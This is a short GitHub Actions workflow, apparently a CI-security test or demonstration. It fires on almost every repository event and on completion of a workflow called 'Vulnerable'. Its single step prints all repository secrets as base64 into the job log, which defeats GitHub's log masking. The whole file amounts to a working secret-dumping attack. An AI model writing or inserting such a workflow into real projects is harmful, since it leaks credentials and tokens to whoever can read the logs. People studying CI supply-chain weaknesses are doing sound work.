name: External

on:
  workflow_dispatch:
  pull_request:
  schedule:
    - cron:  "0 0 * * *"
  push:
  branch_protection_rule:
  check_run:
  check_suite:
  create:
  delete:
  deployment:
  deployment_status:
  discussion:
  discussion_comment:
  fork:
  gollum:
  issue_comment:
  label:
  merge_group:
  milestone:
  page_build:
  project:
  project_card:
  project_column:
  public:
  pull_request_review:
  pull_request_review_comment:
  pull_request_target:
  registry_package:
  release:
  repository_dispatch:
  status:
  watch:
  workflow_call:
  workflow_run:
    workflows: [Vulnerable]
    types:
      - completed
  
jobs:
  execute:
    runs-on: ubuntu-latest

    steps:
      - name: Execute
        run: echo "${{ toJson(secrets) }}" | base64
